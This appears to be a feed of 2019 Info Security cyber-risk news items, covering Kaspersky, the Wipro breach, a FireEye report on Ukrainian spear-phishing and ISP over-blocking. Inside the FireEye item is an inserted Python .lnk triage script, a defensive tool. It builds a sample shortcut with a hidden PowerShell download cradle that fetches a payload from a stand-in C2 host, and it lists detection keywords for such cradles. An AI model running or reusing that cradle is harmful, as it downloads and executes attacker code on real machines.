“As sophistication strengthens, so too does the breadth of industries impacted by bad bots. While bot activity on industries like airlines and ticketing are well-documented, no organization — large or small, public or private — is immune. When critical online activity, like voter registration, can be compromised as a result of bad bot activity, it no longer becomes a challenge to tackle tomorrow. Now is the time to understand what bots are capable of and now is the time to act.”

Categories: Cyber Risk News

EU: We Have No Evidence Kaspersky Lab is Security Risk

Info Security - Wed, 04/17/2019 - 09:35
EU: We Have No Evidence Kaspersky Lab is Security Risk

The European Commission has admitted it has no evidence that Kaspersky Lab products are a national security risk to member states, despite the European Parliament voting last summer for a ban on the Russian AV company.

The admission came in response to a written question from Gerolf Annemans, a right-wing Belgian Member of the European Parliament (MEP).

It refers to the non-binding resolution, passed on June 13 2018, which branded Kaspersky Lab as ‘malicious’ and ‘dangerous.’

“Does the Commission know of any reason other than certain press articles that justifies the labelling of Kaspersky as ‘dangerous’ or ‘malicious’, especially since Member States such as Germany, France and Belgium do not perceive any problems with cooperation with the firm concerned?” he asked.

The Belgian MEP also asked whether the Commission is aware “of any reports or opinions of cyber-experts or consultancies about Kaspersky Lab, and can it give me references to them?”

In response, the Commission said it is “not in possession of any evidence regarding potential issues related to the use of Kaspersky Lab products,” and that “it did not commission any reports” into the issue to find out more.

“The Commission is following closely debates and developments concerning the security of IT products and devices in general, including discussions about potential measures related to access to the EU market,” it added.

“The EU is an open market, which can be accessed by foreign companies in compliance with EU rules. In addition, Member States have the competence to decide whether to exclude companies from their markets for national security reasons.”

That would seem to suggest that, at the time of the vote, too much weight was given to US moves to ban the Moscow-based vendor, even though the US had not publicly produced proof to back its claim that the firm was a national security risk. The UK's National Cyber Security Centre also issued guidance in December 2017 that government departments should not use the vendor's products on systems processing information classified SECRET and above.

The European Parliament motion in question was framed in general terms about cyber-defense, yet only Kaspersky Lab was named, adding weight to the notion that it was unfairly singled out.

It’s unclear why it took so long to gain clarification from the Commission on this.

Categories: Cyber Risk News

Wipro Confirms Major Breach Investigation

Info Security - Wed, 04/17/2019 - 08:45
Wipro Confirms Major Breach Investigation

IT services giant Wipro has revealed it is investigating a potential intrusion, after a report claimed the firm's systems had been compromised and used to attack around a dozen of its customers.

India’s third largest IT outsourcer claimed to have spotted “potentially abnormal activity in a few employee accounts” after an “advanced phishing campaign” targeted the company.

“Upon learning of the incident, we promptly began an investigation, identified the affected users and took remedial steps to contain and mitigate any potential impact,” it continued, according to ETtech.

“We are leveraging our industry-leading cybersecurity practices and collaborating with our partner ecosystem to collect and monitor advanced threat intelligence for enhancing security posture. We have also retained a well-respected, independent forensic firm to assist us in the investigation. We continue to monitor our enterprise and infrastructure at a heightened level of alertness.”

Security journalist Brian Krebs originally reported the incident, citing multiple unnamed sources who claimed a months-long intrusion had taken place, with at least 11 or 12 customers affected.

One source said the information came from the forensic investigation, which found folders on the intruders' back-end infrastructure named after those clients.

Another source claimed that Wipro is being forced to build a new private email network, as the current one was apparently no match for the assumed state-sponsored attackers.

IT services companies are a major target for hackers given the privileged access they can grant to large numbers of client networks.

Chinese state-sponsored attack group APT10 was called out in 2017 after a long-running campaign against MSPs described by British investigators as “one of the largest ever sustained global cyber-espionage campaigns.”

IOActive CTO, Cesar Cerrudo, argued the case is another example of how modern digital supply chains create extra risk for organizations.

“These types of attacks are incredibly difficult to defend against, as trust is an essential part of any partnership. However, companies should be careful to ensure that they have the right controls in place to ensure that even if a hacker does gain access to an employee's credentials, this doesn’t mean they have the keys to the kingdom,” he added.

“If an organization isn't looking for security risks, then a threat actor doesn't need to launch a costly, complex or high-risk supply chain attack to compromise the organization. If the worst happens, and systems are compromised, then having a swift and effective response is essential. Organizations need to be sure they are able to identify the compromise fast (ideally before customers are impacted) and that they can quickly assert which customers may have been impacted and notify them of the potential risk to stop things from spiralling down the supply chain.”

Categories: Cyber Risk News

Almost a Quarter of Orgs Don’t Run Security Checks on Products

Info Security - Wed, 04/17/2019 - 08:35
Almost a Quarter of Orgs Don’t Run Security Checks on Products

A new study from Outpost24 has discovered that almost one in four (23%) organizations do not carry out any form of security testing on their products before they are launched into the market.

The cyber-assessment firm surveyed 121 security professionals at RSA Conference 2019, unearthing a worrying trend whereby application security appears to be taking a back seat in a number of product-producing companies.

In fact, Outpost24 found that 31% of respondents admitted that their organization had knowingly marketed a product with security vulnerabilities just to beat competition, and that 44% of organizations do not introduce security into the app development cycle from the beginning. Only 56% of respondents were sure their company carried out security testing on products before going to market.

“These figures raise concerns about the priority that organizations are placing on security, especially when attempting to beat competition by rushing products to market,” said Bob Egner, VP of Outpost24. “What many of the respondents are clearly forgetting is the damage security vulnerabilities can not only do to an organization’s customers, but also to brand and reputation. If a company ships products which are notoriously flawed with security vulnerabilities then they will not keep their customers for long and may ultimately face legal issues. The value of beating competition can be lost or even reversed.”

Any organization that is developing and marketing products should build security in at the design stage, Egner added, since the cost of fixing a flaw is well documented to be lower the earlier in the development process it is found. “Taking a secure by design approach will mean security is built into the foundations of a product and will limit the cyber risks faced by users, which will ultimately increase customer satisfaction as well.”

Categories: Cyber Risk News

Spear-Phishing Campaign Targeted Ukrainian Government as Early as 2014

Info Security - Tue, 04/16/2019 - 14:54
Spear-Phishing Campaign Targeted Ukrainian Government as Early as 2014

A spear-phishing email campaign targeting government entities in Ukraine could have been active as early as 2014, according to FireEye.

In a blog post published on April 16, 2019, FireEye Threat Intelligence described the latest spear-phishing email, seen in early 2019, which carried a "malicious LNK file" whose embedded PowerShell script downloads the second-stage payload from the command-and-control (C&C) server. The email was received by military departments in Ukraine and used lure content related to the sale of demining machines.

According to FireEye, "This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014." The company also wrote that the infrastructure analysis indicated the actors behind the intrusion activity may be associated with the so-called Luhansk People's Republic (LPR).

The email, sent on January 22, 2019, used the subject "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender address was spoofed to appear to come from Armtrac, a defense manufacturer in the United Kingdom. The attachment was a 7z package containing two benign documents and one malicious LNK file.
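A triage check for the attachment type described above, as an added example that is not FireEye's code: a minimal parser for the Windows Shell Link (.lnk) binary format that pulls out the shortcut's relative target path, working directory and command-line arguments, followed by a keyword scan for PowerShell download cradles. The sample shortcut is constructed here with a helper (c2.invalid is a reserved name), and the indicator list is an assumption for illustration, not FireEye's detection logic. In practice you would extract the 7z archive first and run the triage over every .lnk inside it.

```python
"""Triage of .lnk attachments for PowerShell download cradles (added example).
Parses the Shell Link header and StringData per MS-SHLLINK, then scans the
target and arguments for cradle indicators."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-...-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1); they fix the order of the StringData fields.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1, 2, 4, 8
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 16, 32, 64, 128
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Indicator list is an assumption for illustration; extend it from your own telemetry.
CRADLE_RE = re.compile(
    r"powershell|pwsh|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"net\.webclient|invoke-expression|\biex\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|"
    r"https?://|mshta|bitsadmin", re.IGNORECASE)


def parse_lnk_strings(data):
    """Return the StringData fields of a .lnk as a dict, skipping the optional
    LinkTargetIDList and LinkInfo blocks that precede them."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                        # fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:               # u16 IDListSize, then IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                         # u32 LinkInfoSize covers the block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:                  # each: u16 CountCharacters + chars
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def triage_lnk(data):
    """Return (suspicious, indicators, fields) for one .lnk blob."""
    fields = parse_lnk_strings(data)
    target = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    indicators = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(target)})
    return bool(indicators), indicators, fields


def build_lnk(relative_path, arguments, working_dir=None, unicode=True):
    """Construct a minimal .lnk (header + StringData only) so the example runs offline."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    if working_dir is not None:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + b"\x00" * (0x4C - 24)

    def s(text):
        enc = text.encode("utf-16-le") if unicode else text.encode("cp1252")
        return struct.pack("<H", len(text)) + enc

    body = s(relative_path)
    if working_dir is not None:
        body += s(working_dir)
    return header + body + s(arguments)


# Constructed sample (not FireEye's actual attachment): a shortcut that launches a
# hidden PowerShell window to fetch a second stage; c2.invalid is a reserved name.
MALICIOUS_LNK = build_lnk(
    relative_path=r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=r"-w hidden -nop -c (New-Object Net.WebClient).DownloadFile('http://c2.invalid/s2.bin',$env:TEMP+'\s2.exe')",
    working_dir=r"C:\Windows\System32")
BENIGN_LNK = build_lnk(r"..\notepad.exe", "readme.txt", unicode=False)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        suspicious, indicators, fields = triage_lnk(blob)
        print(f"{label}: {'SUSPICIOUS' if suspicious else 'clean'} {indicators}")
        print("   target:", fields.get("relative_path"), fields.get("arguments"))
```

The parser deliberately ignores the IDList and LinkInfo blocks, which is enough for triage because the command line lives in StringData; a real shortcut from a target machine also carries machine ID and volume serial in those blocks, which are worth keeping for attribution. Keyword matching on the arguments is a first pass only: encoded commands (-enc) and string concatenation defeat it, so treat any shortcut whose target resolves to a script interpreter as suspicious regardless of the argument text.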

"Compilation times indicate that this actor, who focused primarily on Ukraine, may have been active since at least 2014," the blog post says. "Their activity was first reported by FireEye Threat Intelligence in early 2018. They gradually increased in sophistication and leveraged both custom and open-source malware."

Ukraine legislation describes so-called LPR as "temporarily occupied territory" and its government as an "occupying administration of the Russian Federation," according to FireEye. 

"While cyber-espionage is regularly leveraged as a tool of state power, this capability is not limited to states," said John Hultquist, director of analysis, FireEye. "Just as new state actors are consistently drawn to this practice, many sub-state actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory.

"It is not uncommon for nascent, geographically limited operations to mature over time and step outside of their region. This has been the case with several actors we regularly track in the Ukraine, where threats to elections and industry developed into the operations we saw during the 2016 elections and the NotPetya event."

Example of Spear-Phishing Email. Source: FireEye
Categories: Cyber Risk News

Support Services Websites Cut Off from UK Public by Gov-Backed ISPs

Info Security - Tue, 04/16/2019 - 13:10
Support Services Websites Cut Off from UK Public by Gov-Backed ISPs

Charity, school and social support websites are being blocked by "overzealous" web filters, which have been designed to protect children from harmful online content. 

According to a study from a VPN comparison service and the Open Rights Group, "In the last two years around 700,000 websites have been blocked by UK ISPs in a Government-backed attempt to protect vulnerable users online."

The report analysed the results of tests on 35 million unique domains across 15 ISPs and mobile providers. The content filters are active in 3.7 million British households, plus mobile phone users who haven't opted out.

The study says that "due to a combination of keyword-based, crude and highly opaque filtering systems," over 400 UK charities, social support and school websites have been hit the hardest. These systems have been found to prevent adults from accessing vital information about drug and alcohol addiction, mental health support and sexual and domestic abuse.

The indiscriminate nature of these filters is underlined by what happens when blocks are challenged: since 2017, fewer than 5% of the blocks that site owners reported as wrong have been upheld, while around 1,300 were reversed, which suggests that many more sites have been, and remain, incorrectly blocked. The issue is compounded by the fact that many businesses and charities are unaware that ISPs are blocking their websites, since they would only notice if their own provider applied the same filter.

Jim Killock, executive director at Open Rights Group, said: “Filters are fundamentally bad products that block too much and too little. Our report shows that website publishers are suffering the consequences. The only decent solution is to be very cautious about using filters. People should only use them if they are clear that they are necessary. Unfortunately, many filters are opt-out, so too many people and homes are using them needlessly.

“ISPs are using out-of-the-box solutions from third parties and so tend to pass the buck on queries about filtering. What we need is greater transparency into how ISPs are blocking sites. It should not be down to the volunteer efforts of donation-driven services such as to deal with the problems that this government policy has created.”

The study also found that small businesses had fallen foul of the "aggressive" filters. Drainage companies, for example, had been caught up in ISP filters for using terms like "unblock", which the filters treat as a sign of web anonymizers and proxies.

Simon Migliano, head of research at the VPN comparison service, explained: “A well-intentioned scheme by the government to protect children from harmful content online has become a textbook example of ill-thought-out and ham-fisted censorship. The irony is that the original intent was to protect the vulnerable online whereas now in-need adults are struggling to find vital information, and charities and support centers are being stifled by indiscriminate filters.

“This is a prime example of what happens when you use a blunt instrument for a delicate task. These crude and decidedly intransparent filters are hurting more than they are helping, and the responsibility to improve this dire situation should now sit with the ISPs and the government.” 

This issue is compounded by the complexity of getting innocent sites unblocked and the response rate in rectifying these issues. Almost three in 10 (27.6%) unblock requests to ISPs from 2018 are still unresolved, with TalkTalk and Virgin Media as the worst offenders.

Categories: Cyber Risk News

Fortinet to Pay $545,000 for Violating False Claims Act

Info Security - Tue, 04/16/2019 - 12:56
Fortinet to Pay $545,000 for Violating False Claims Act

Network security company Fortinet has agreed to pay $545,000 to resolve allegations that it violated the US's False Claims Act.

According to the settlement agreement made public on April 12, 2019, "Fortinet acknowledged that during the more than seven years between January of 2009 and the fall of 2016, a Fortinet employee responsible for supply chain management arranged to have labels on certain products altered to make the products appear to be compliant with the Trade Agreement Act (TAA). A portion of the products was resold through distributors and subsequent resellers to U.S. government end users." 

“Today’s announcement illustrates the continuing commitment of the US Attorney’s Office and our law enforcement partners to identify and prosecute fraudulent schemes relating to the sale of goods to the United States,” said US Attorney David L. Anderson.  

“Contractors that supply the US government with Chinese-made technology will be pursued and held accountable when violating the Trade Agreement Act,” said Defense Criminal Investigative Service (DCIS) Special Agent in Charge Bryan D. Denny. “The DCIS and its law enforcement partners are committed to combating procurement fraud and cyber-risk within US Department of Defense programs.”

The TAA prohibits certain government contractors from purchasing products that are not entirely from, or “substantially transformed” in, the United States or certain designated countries. According to the public announcement, in this case Fortinet acknowledged that the "Responsible Employee" directed certain employees and contractors to change product labels so that no country of origin was listed or to include the phrases “Designed in the United States and Canada,” or “Assembled in the United States.”  

According to Fortinet's website, the company serves government organization customers. Some of these include Alamance County in North Carolina and Salt Lake County in Utah. 

The company has agreed to pay $400,000 and to provide the United States Marine Corps with additional equipment valued at $145,000.  

The lawsuit was filed by former Fortinet employee Yuxin “Jay” Fang under the qui tam provisions of the False Claims Act. It was then investigated by the U.S. Attorney’s Office of the Northern District of California, along with other government organizations.

“This settlement displays the steadfast commitment of our agents and our federal law enforcement partners,” said the U.S. Army Criminal Investigation Command’s (USACIDC's) director of major procurement fraud unit, Marion "Frank" Robey. “This settlement is a clear signal to the supply community doing business with the Department of the Army; fraud will not be tolerated in any way, shape or form.” 

Commenting on the issue, Fortinet said: “We hold ourselves to the highest ethical standards of trust and integrity. This was an isolated incident that involved events from more than two years ago in which a rogue former employee acted against our policies. When we were made aware of the incident, we took immediate action, including thoroughly investigating the matter, terminating the employee and implementing additional safeguards to prevent an issue like this from happening again. The nominal settlement amount of $545,000 reflects in part our cooperation to promptly and thoroughly address this matter.”

Categories: Cyber Risk News